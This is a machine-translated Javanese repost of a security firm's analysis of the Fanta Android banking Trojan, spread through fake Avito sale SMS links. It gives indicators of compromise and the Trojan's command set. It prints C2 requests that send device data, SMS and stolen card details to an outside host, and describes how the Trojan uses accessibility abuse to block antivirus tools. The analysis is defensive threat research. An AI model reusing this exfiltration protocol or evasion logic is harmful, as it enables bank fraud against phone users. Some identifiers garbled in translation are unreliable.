ProHoster > Блог > warta internet > Leysya, Fanta: taktik anyar kanggo Trojan Android lawas

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas

Sawijining dina sampeyan pengin adol barang ing Avito lan, sawise ngirim katrangan rinci babagan produk sampeyan (umpamane, modul RAM), sampeyan bakal nampa pesen iki:

Leysya, Fanta: taktik anyar kanggo Trojan Android lawasSawise sampeyan mbukak link kasebut, sampeyan bakal weruh kaca sing katon ora mbebayani sing ngandhani sampeyan, bakul sing seneng lan sukses, yen sampeyan wis tuku:

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas
Sawise sampeyan ngeklik tombol "Terusake", file APK kanthi lambang lan jeneng sing dipercaya bakal diundhuh menyang piranti Android sampeyan. Sampeyan wis nginstal aplikasi sing sakperangan alesan njaluk hak AccessibilityService, banjur sawetara jendhela katon lan cepet ilang lan ... Mekaten.

Sampeyan pindhah menyang mriksa imbangan, nanging sakperangan alesan app banking takon rincian kertu maneh. Sawise ngetik data, ana kedadeyan sing nggegirisi: sakperangan alesan isih ora jelas kanggo sampeyan, dhuwit wiwit ilang saka akun sampeyan. Sampeyan nyoba ngatasi masalah kasebut, nanging telpon nolak: mencet tombol "Mbalik" lan "Ngarep", ora mateni lan ora ngidini sampeyan ngaktifake langkah-langkah keamanan. Akibaté, sampeyan ora duwe dhuwit, barang sampeyan ora dituku, sampeyan bingung lan mikir: apa sing kedadeyan?

Jawaban iki prasaja: sampeyan wis dadi korban saka Android Trojan Fanta, anggota saka kulawarga Flexnet. Kepiye kedadeyan kasebut? Ayo dadi nerangake saiki.

Penulis: Andrey Polovinkin, spesialis junior ing analisis malware, Ivan Pisarev, spesialis ing analisis malware.

Sawetara statistik

Kulawarga Flexnet saka Android Trojans pisanan dikenal ing taun 2015. Sajrone kegiatan sing cukup suwe, kulawarga kasebut dadi sawetara subspesies: Fanta, Limebot, Lipton, lsp. Trojan, uga infrastruktur sing ana gandhengane, ora mandheg: skema distribusi efektif anyar dikembangake - ing kasus kita, kaca phishing berkualitas tinggi sing ditujokake kanggo penjual pangguna tartamtu, lan pangembang Trojan ngetutake tren modis ing nulis virus - nambah fungsi anyar sing ndadekake iku bisa kanggo nyolong luwih irit dhuwit saka piranti infèksi lan mekanisme pangayoman bypass.

Kampanye sing diterangake ing artikel iki ditujokake kanggo pangguna saka Rusia; sawetara piranti sing kena infeksi direkam ing Ukraina, lan luwih sithik ing Kazakhstan lan Belarus.

Sanajan Flexnet wis ana ing arena Trojan Android luwih saka 4 taun saiki lan wis diteliti kanthi rinci dening akeh peneliti, nanging isih apik. Wiwit Januari 2019, jumlah karusakan potensial luwih saka 35 yuta rubel - lan iki mung kanggo kampanye ing Rusia. Ing 2015, macem-macem versi Trojan Android iki didol ing forum lemah, ing ngendi kode sumber Trojan kanthi katrangan rinci uga bisa ditemokake. Iki tegese statistik karusakan ing donya malah luwih nyengsemaken. Ora indikator ala kanggo wong tuwa kuwi, ta?

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas

Saka dodolan kanggo ngapusi

Kaya sing bisa dideleng saka gambar kaca phishing sing ditampilake sadurunge kanggo layanan Internet kanggo ngirim iklan Avito, iki disiapake kanggo korban tartamtu. Ketoke, panyerang nggunakake salah sawijining parser Avito, sing njupuk nomer telpon lan jeneng penjual, uga deskripsi produk. Sawise nggedhekake kaca lan nyiapake file APK, korban dikirim SMS kanthi jeneng lan link menyang kaca phishing sing ngemot deskripsi produk lan jumlah sing ditampa saka "sale" produk. Kanthi ngeklik tombol kasebut, pangguna nampa file APK angkoro - Fanta.

Panaliten babagan domain shcet491[.]ru nuduhake manawa didelegasi menyang server DNS Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

File zona domain ngemot entri sing nuduhake alamat IP 31.220.23[.]236, 31.220.23[.]243, lan 31.220.23[.]235. Nanging, cathetan sumber daya utami domain (A record) nuding menyang server kanthi alamat IP 178.132.1[.]240.

Alamat IP 178.132.1[.]240 dumunung ing Walanda lan kalebu ing hoster. WorldStream. alamat IP 31.220.23[.]235, 31.220.23[.]236 lan 31.220.23[.]243 dumunung ing UK lan kagungane hosting hosting server HOSTINGER. Digunakake minangka recorder openprov-ru. Domain ing ngisor iki uga ditanggulangi menyang alamat IP 178.132.1[.]240:

  • sdelka-ru [.]ru
  • tovar-av [.]ru
  • av-tovar [.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Perlu dicathet menawa pranala ing format ing ngisor iki kasedhiya saka meh kabeh domain:

http://(www.){0,1}<%domain%>/[0-9]{7}

Cithakan iki uga kalebu link saka pesen SMS. Adhedhasar data historis, ditemokake yen siji domain cocog karo sawetara pranala ing pola kasebut ing ndhuwur, sing nuduhake yen siji domain digunakake kanggo nyebarake Trojan menyang sawetara korban.

Ayo maju sethithik: Trojan sing diundhuh liwat link saka SMS nggunakake alamat kasebut minangka server kontrol onusedseddohap [.]klub. Domain iki didaftar ing 2019-03-12, lan wiwit 2019-04-29, aplikasi APK wis sesambungan karo domain iki. Adhedhasar data sing dipikolehi saka VirusTotal, total 109 aplikasi sing sesambungan karo server iki. Domain dhewe ditanggulangi menyang alamat IP 217.23.14[.]27, dumunung ing Walanda lan diduweni dening hoster WorldStream. Digunakake minangka recorder namecheap. Domain uga ditanggulangi menyang alamat IP iki bad-racoon [.]klub (wiwit saka 2018-09-25) lan ala-racoon [.]urip (wiwit 2018-10-25). Kanthi domain bad-racoon [.]klub luwih saka 80 file APK sesambungan karo ala-racoon [.]urip - luwih saka 100.

Umumé, serangan kasebut maju kaya ing ngisor iki:

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas

Apa sing ana ing sangisore tutupe Fanta?

Kaya akeh Trojan Android liyane, Fanta bisa maca lan ngirim pesen SMS, nggawe panjalukan USSD, lan nampilake jendhela dhewe ing ndhuwur aplikasi (kalebu perbankan). Nanging, arsenal fungsi kulawarga iki wis teka: Fanta wiwit digunakake Layanan Aksesibilitas kanggo macem-macem tujuan: maca isi kabar saka aplikasi liyane, nyegah deteksi lan mungkasi eksekusi Trojan ing piranti sing kena infeksi, lsp. Fanta dianggo ing kabeh versi Android ora luwih enom saka 4.4. Ing artikel iki kita bakal nliti conto Fanta ing ngisor iki:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Sanalika sawise diluncurake

Sanalika sawise diluncurake, Trojan ndhelikake lambang kasebut. Aplikasi kasebut mung bisa digunakake yen jeneng piranti sing kena infeksi ora ana ing dhaptar:

  • android_x86
  • VirtualBox
  • Nexus 5X (bulhead)
  • Nexus 5 (silet)

Priksa iki ditindakake ing layanan utama Trojan - Layanan Utama. Nalika diluncurake sapisanan, paramèter konfigurasi aplikasi diinisialisasi dadi nilai standar (format kanggo nyimpen data konfigurasi lan maknane bakal dibahas mengko), lan piranti sing kena infeksi anyar didaftar ing server kontrol. Panjaluk HTTP POST kanthi jinis pesen bakal dikirim menyang server register_bot lan informasi babagan piranti sing kena infeksi (versi Android, IMEI, nomer telpon, jeneng operator lan kode negara sing operator kadhaptar). Alamat kasebut minangka server kontrol hXXp://onuseseddohap[.]club/controller.php. Kanggo nanggepi, server ngirim pesen sing ngemot kolom kasebut bot_id, bot_pwd, server - aplikasi nyimpen nilai kasebut minangka parameter server CnC. Paramèter server opsional yen kolom ora ditampa: Fanta nggunakake alamat registrasi - hXXp://onuseseddohap[.]club/controller.php. Fungsi ngganti alamat CnC bisa digunakake kanggo ngatasi rong masalah: kanggo nyebarake beban kanthi merata ing antarane sawetara server (yen ana akeh piranti sing kena infeksi, beban ing server web sing ora dioptimalake bisa dhuwur), lan uga digunakake. server alternatif yen salah siji saka server CnC gagal.

Yen ana kesalahan nalika ngirim panjalukan, Trojan bakal mbaleni proses registrasi sawise 20 detik.

Sawise piranti wis kasil didaftar, Fanta bakal nampilake pesen ing ngisor iki kanggo pangguna:

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas
Wigati penting: layanan disebut Sistem Keamanan — jeneng layanan Trojan, lan sawise ngeklik tombol OK Jendhela bakal mbukak kanthi setelan Aksesibilitas piranti sing kena infeksi, ing ngendi pangguna kudu menehi hak Aksesibilitas kanggo layanan ala:

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas
Sanalika pangguna nguripake Layanan Aksesibilitas, Fanta entuk akses menyang isi jendhela aplikasi lan tumindak sing ditindakake:

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas
Sanalika sawise nampa hak Aksesibilitas, Trojan njaluk hak administrator lan hak kanggo maca kabar:

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas
Nggunakake AccessibilityService, aplikasi simulates keystrokes, mangkono menehi dhewe kabeh hak perlu.

Fanta nggawe sawetara kedadean database (sing bakal diterangake mengko) perlu kanggo nyimpen data konfigurasi, uga informasi sing diklumpukake ing proses babagan piranti sing kena infeksi. Kanggo ngirim informasi sing diklumpukake, Trojan nggawe tugas mbaleni sing dirancang kanggo ngundhuh lapangan saka database lan nampa perintah saka server kontrol. Interval kanggo ngakses CnC disetel gumantung ing versi Android: ing kasus 5.1, interval bakal 10 detik, yen ora 60 detik.

Kanggo nampa perintah kasebut, Fanta njaluk panjaluk GetTask menyang server manajemen. Nanggepi, CnC bisa ngirim salah siji saka printah ing ngisor iki:

tim Description
0 Kirim pesen SMS
1 Telpon utawa printah USSD
2 Nganyari parameter interval
3 Nganyari parameter nyegat
6 Nganyari parameter smsManager
9 Miwiti ngumpulake pesen SMS
11 Reset telpon menyang setelan pabrik
12 Aktifake / Pateni logging saka nggawe kothak dialog

Fanta uga ngumpulake kabar saka 70 aplikasi perbankan, sistem pembayaran cepet lan e-dompet lan nyimpen ing database.

Nyimpen paramèter konfigurasi

Kanggo nyimpen parameter konfigurasi, Fanta nggunakake pendekatan standar kanggo platform Android - Gawe- file. Setelan bakal disimpen menyang file jenenge setelan. Katrangan babagan paramèter sing disimpen ana ing tabel ing ngisor iki.

Имя Nilai standar Nilai sing bisa ditindakake Description
id 0 Integer ID bot
server hXXp://onuseseddohap[.]club/ URL Alamat server kontrol
pwd - String Sandi server
interval 20 Integer Interval wektu. Nuduhake suwene tugas ing ngisor iki kudu ditundha:

  • Nalika ngirim panjalukan babagan status pesen SMS sing dikirim
  • Nampa printah anyar saka server manajemen
nyegat kabeh kabeh / telNumber Yen lapangan padha karo senar kabeh utawa nomer tel, banjur pesen SMS sing ditampa bakal dicegat dening aplikasi lan ora ditampilake kanggo pangguna
smsManager 0 0/1 Aktifake / mateni aplikasi minangka panampa SMS standar
macaDialog palsu Bener / salah Aktifake / Pateni logging acara AksesibilitasAcara

Fanta uga nggunakake file kasebut smsManager:

Имя Nilai standar Nilai sing bisa ditindakake Description
pckg - String Jeneng pangatur pesen SMS sing digunakake

Interaksi karo database

Sajrone operasi, Trojan nggunakake rong database. Database jenenge a digunakake kanggo nyimpen macem-macem informasi sing diklumpukake saka telpon. Database kapindho dijenengi fanta.db lan digunakake kanggo nyimpen setelan tanggung jawab kanggo nggawe phishing windows dirancang kanggo ngumpulake informasi bab kertu bank.

Trojan nggunakake database а kanggo nyimpen informasi sing diklumpukake lan nyathet tumindak sampeyan. Data disimpen ing tabel log. Kanggo nggawe tabel, gunakake pitakon SQL ing ngisor iki:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Database ngemot informasi ing ngisor iki:

1. Log wiwitan piranti sing kena infeksi nganggo pesen Telpon diuripake!

2. Kabar saka aplikasi. Pesen digawe miturut cithakan ing ngisor iki:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Data kertu bank saka formulir phishing digawe dening Trojan. Paramèter VIEW_NAME bisa uga salah siji saka ing ngisor iki:

  • AliExpress
  • Avito
  • Google Play
  • Aneka <%Jeneng Aplikasi%>

Pesen kasebut mlebu ing format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Pesen SMS mlebu/metu ing format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informasi babagan paket sing nggawe kothak dialog ing format:

(<%Package name%>)<%Package information%>

Tuladha tabel log:

Leysya, Fanta: taktik anyar kanggo Trojan Android lawas
Salah sawijining fungsi Fanta yaiku nglumpukake informasi babagan kertu bank. Pangumpulan data dumadi liwat nggawe jendhela phishing nalika mbukak aplikasi perbankan. Trojan nggawe jendhela phishing mung sapisan. Informasi sing jendhela ditampilake kanggo pangguna disimpen ing tabel setelan ing basis data fanta.db. Kanggo nggawe database, gunakake query SQL ing ngisor iki:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Kabeh lapangan meja setelan kanthi gawan diinisialisasi dadi 1 (gawe jendela phishing). Sawise pangguna ngetik data, nilai bakal disetel kanggo 0. Conto kolom tabel setelan:

  • bisa_login - lapangan tanggung jawab kanggo nampilake formulir nalika mbukak aplikasi perbankan
  • first_bank - ora digunakake
  • bisa_avito - lapangan tanggung jawab kanggo nampilake formulir nalika mbukak aplikasi Avito
  • bisa_ali - lapangan tanggung jawab kanggo nampilake formulir nalika mbukak aplikasi Aliexpress
  • bisa_liyane - lapangan tanggung jawab kanggo nampilake formulir nalika mbukak aplikasi apa wae saka dhaptar: Yula, Pandao, Drom Auto, Dompet. Diskon lan kertu bonus, Aviasales, Booking, Trivago
  • kertu_bisa - lapangan tanggung jawab kanggo nampilake formulir nalika mbukak Google Play

Interaksi karo server manajemen

Interaksi jaringan karo server manajemen dumadi liwat protokol HTTP. Kanggo nggarap jaringan, Fanta nggunakake perpustakaan Retrofit sing populer. Panyuwunan dikirim menyang: hXXp://onuseseddohap[.]club/controller.php. Alamat server bisa diganti nalika ndhaptar ing server. Cookie bisa dikirim minangka respon saka server. Fanta nggawe panjaluk ing ngisor iki menyang server:

  • Registrasi bot ing server kontrol dumadi sapisan, nalika diluncurake pisanan. Data ing ngisor iki babagan piranti sing kena infeksi dikirim menyang server:
    · cookie - cookie sing ditampa saka server (nilai standar minangka string kosong)
    · mode - string konstan register_bot
    · ater-ater - konstanta integer 2
    · versi_sdk - dibentuk miturut cithakan ing ngisor iki: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI piranti sing kena infeksi
    · negara — kode negara sing operator kadhaptar, ing format ISO
    · nomer - nomer telpon
    · operator - jeneng operator

    Conto panjalukan sing dikirim menyang server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Nanggepi panjalukan kasebut, server kudu ngasilake obyek JSON sing ngemot parameter ing ngisor iki:
    · bot_id - ID piranti sing kena infeksi. Yen bot_id padha karo 0, Fanta bakal nglakokake maneh panjaluk kasebut.
    bot_pwd - sandi kanggo server.
    server - alamat server kontrol. Parameter opsional. Yen parameter ora ditemtokake, alamat sing disimpen ing aplikasi bakal digunakake.

    Conto obyek JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Panjaluk nampa prentah saka server. Data ing ngisor iki dikirim menyang server:
    · cookie - cookie sing ditampa saka server
    · tawaran - id piranti sing kena infeksi sing ditampa nalika ngirim panjaluk register_bot
    · pwd - sandi kanggo server
    · divice_admin - lapangan nemtokake apa hak administrator wis dijupuk. Yen hak administrator wis dijupuk, lapangan padha karo 1, yen ora 0
    · Aksesibilitas - Status operasi Layanan Aksesibilitas. Yen layanan diwiwiti, regane 1, yen ora 0
    · SMSManager — nuduhake apa Trojan diaktifake minangka aplikasi standar kanggo nampa SMS
    · layar - nuduhake kahanan layar. Nilai bakal disetel 1, yen layar urip, digunakake 0;

    Conto panjalukan sing dikirim menyang server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Gumantung saka printah kasebut, server bisa ngasilake obyek JSON kanthi paramèter sing beda:

    · tim Kirim pesen SMS: Parameter ngemot nomer telpon, teks pesen SMS lan ID pesen sing dikirim. Pengenal digunakake nalika ngirim pesen menyang server kanthi jinis setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · tim Telpon utawa printah USSD: Nomer telpon utawa printah teka ing awak respon. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · tim Ngganti parameter interval. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · tim Ngganti parameter intercept. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · tim Ganti kolom SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · tim Nglumpukake pesen SMS saka piranti sing kena infeksi.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · tim Reset telpon menyang setelan pabrik: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · tim Ngganti parameter ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Ngirim pesen kanthi jinis setSmsStatus. Panjaluk iki ditindakake sawise printah kasebut dieksekusi Kirim pesen SMS. Panjaluk katon kaya iki:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Ngunggah isi database. Siji baris dikirim saben panyuwunan. Data ing ngisor iki dikirim menyang server:
    · cookie - cookie sing ditampa saka server
    · mode - string konstan setSaveInboxSms
    · tawaran - id piranti sing kena infeksi sing ditampa nalika ngirim panjaluk register_bot
    · teks - teks ing rekaman database saiki (field d saka meja log ing basis data а)
    · nomer - jeneng rekaman database saiki (field p saka meja log ing basis data а)
    · sms_mode - nilai integer (field m saka meja log ing basis data а)

    Panjaluk katon kaya iki:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Yen kasil dikirim menyang server, baris bakal dibusak saka meja. Conto obyek JSON sing bali dening server:

    {
    "response":[],
    "status":"ok"
}

Interaksi karo AccessibilityService

AccessibilityService dileksanakake kanggo nggawe piranti Android luwih gampang digunakake kanggo wong sing ora duwe kabisan. Umume kasus, interaksi fisik dibutuhake kanggo sesambungan karo aplikasi. AccessibilityService ngidini sampeyan nindakake kanthi terprogram. Fanta nggunakake layanan kasebut kanggo nggawe windows palsu ing aplikasi perbankan lan nyegah pangguna mbukak setelan sistem lan sawetara aplikasi.

Nggunakake fungsi AccessibilityService, Trojan ngawasi owah-owahan unsur ing layar piranti sing kena infeksi. Kaya sing wis diterangake sadurunge, setelan Fanta ngemot parameter sing tanggung jawab kanggo operasi log nganggo kothak dialog - macaDialog. Yen parameter iki disetel, informasi babagan jeneng lan katrangan saka paket sing micu acara bakal ditambahake menyang database. Trojan nindakake tumindak ing ngisor iki nalika acara dipicu:

  • Simulates mencet tombol mburi lan ngarep ing kasus ing ngisor iki:
    · yen pangguna pengin urip maneh piranti
    · yen pangguna pengin mbusak aplikasi "Avito" utawa ngganti hak akses
    · yen ana sebutno aplikasi "Avito" ing kaca
    · nalika mbukak aplikasi Google Play Protect
    · nalika mbukak kaca kanthi setelan AccessibilityService
    · nalika kothak dialog Keamanan Sistem katon
    · nalika mbukak kaca kanthi setelan "Draw over other app".
    · nalika mbukak kaca "Aplikasi", "Pamulihan lan reset", "Reset data", "Reset setelan", "Panel pangembang", "Khusus. kesempatan", "Kesempatan khusus", "Hak khusus"
    · yen acara kasebut digawe dening aplikasi tartamtu.

    Dhaptar aplikasi

    • Android
    • Master Lite
    • Master sing resik
    • Master resik kanggo x86 CPU
    • Manajemen Ijin Aplikasi Meizu
    • Keamanan MIUI
    • Master Resik - Antivirus & Cache lan Pembersih Sampah
    • Kontrol wong tuwa lan GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Pembersih Virus, Antivirus, Pembersih (Keamanan MAX)
    • Mobile AntiVirus Security PRO
    • Antivirus Avast & perlindungan gratis 2019
    • Mobile Security MegaFon
    • AVG Protection kanggo Xperia
    • Keamanan seluler
    • Malwarebytes antivirus & proteksi
    • Antivirus kanggo Android 2019
    • Master Keamanan - Antivirus, VPN, AppLock, Booster
    • Antivirus AVG kanggo Manajer Sistem tablet Huawei
    • Aksesibilitas Samsung
    • Samsung Smart Manager
    • Keamanan Master
    • Kacepetan nyurung
    • dr.web
    • Ruang Keamanan Dr.Web
    • Pusat Kontrol Seluler Dr.Web
    • Dr.Web Keamanan Space Life
    • Pusat Kontrol Seluler Dr.Web
    • Antivirus & Keamanan Seluler
    • Kaspersky Internet Security: Antivirus lan Proteksi
    • Urip baterei Kaspersky: Ngirit & Booster
    • Kaspersky Endpoint Security - pangayoman lan manajemen
    • AVG Antivirus gratis 2019 - Perlindhungan kanggo Android
    • Android Antivirus
    • Norton Mobile Security lan Antivirus
    • Antivirus, firewall, VPN, keamanan seluler
    • Keamanan Seluler: antivirus, VPN, proteksi maling
    • Antivirus kanggo Android

  • Yen ijin dijaluk nalika ngirim pesen SMS menyang nomer cendhak, Fanta simulates ngeklik ing kothak centhang Elinga pilihan lan tombol ngirim.
  • Nalika sampeyan nyoba njupuk hak administrator saka Trojan, iku ngunci layar telpon.
  • Nyegah nambah pangurus anyar.
  • Yen aplikasi antivirus dr.web dideteksi ancaman, Fanta niru mencet tombol nglirwakake.
  • Trojan simulates mencet tombol mburi lan ngarep yen acara kui dening aplikasi Samsung Piranti Care.
  • Fanta nggawe jendhela phishing kanthi formulir kanggo ngetik informasi babagan kertu bank yen aplikasi saka dhaptar udakara 30 layanan Internet sing beda diluncurake. Antarane: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, lsp.

    Formulir Phishing

    Fanta nganalisa aplikasi endi sing mlaku ing piranti sing kena infeksi. Yen aplikasi kapentingan dibukak, Trojan nampilake jendhela phishing ing ndhuwur kabeh liyane, yaiku formulir kanggo ngetik informasi kertu bank. Pangguna kudu ngetik data ing ngisor iki:

    • Nomer kertu
    • Tanggal kadaluwarsa kertu
    • CVV
    • Jeneng sing duwe kertu (ora kanggo kabeh bank)

    Gumantung ing aplikasi sing mlaku, jendhela phishing beda bakal ditampilake. Ing ngisor iki conto sawetara:

    AliExpress:

    Leysya, Fanta: taktik anyar kanggo Trojan Android lawas
    Avito:

    Leysya, Fanta: taktik anyar kanggo Trojan Android lawas
    Kanggo sawetara aplikasi liyane, f.eks. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: taktik anyar kanggo Trojan Android lawas

    Carane tenan iki

    Untunge, wong sing nampa pesen SMS sing diterangake ing wiwitan artikel kasebut dadi spesialis cybersecurity. Mulane, versi nyata, non-direktur beda karo sing dicritakake sadurunge: ana wong sing nampa SMS sing menarik, lan banjur menehi menyang tim Intelligence Hunting Ancaman Group-IB. Asil saka serangan iki artikel. Happy ending, kan? Nanging, ora kabeh crita rampung kanthi sukses, lan supaya sampeyan ora katon kaya potong direktur kanthi mundhut dhuwit, ing pirang-pirang kasus, cukup kanggo netepi aturan sing wis suwe diterangake:

    • Aja nginstal aplikasi kanggo piranti seluler sing nganggo OS Android saka sumber liyane kajaba Google Play
    • Nalika nginstal aplikasi, mbayar manungsa waé khusus kanggo hak-hak sing dijaluk dening aplikasi
    • mbayar manungsa waé kanggo ekstensi file sing diundhuh
    • nginstal nganyari OS Android kanthi rutin
    • aja ngunjungi sumber sing curiga lan aja download file saka ing kono
    • Aja ngeklik tautan sing ditampa ing pesen SMS.

Source: www.habr.com

Add a comment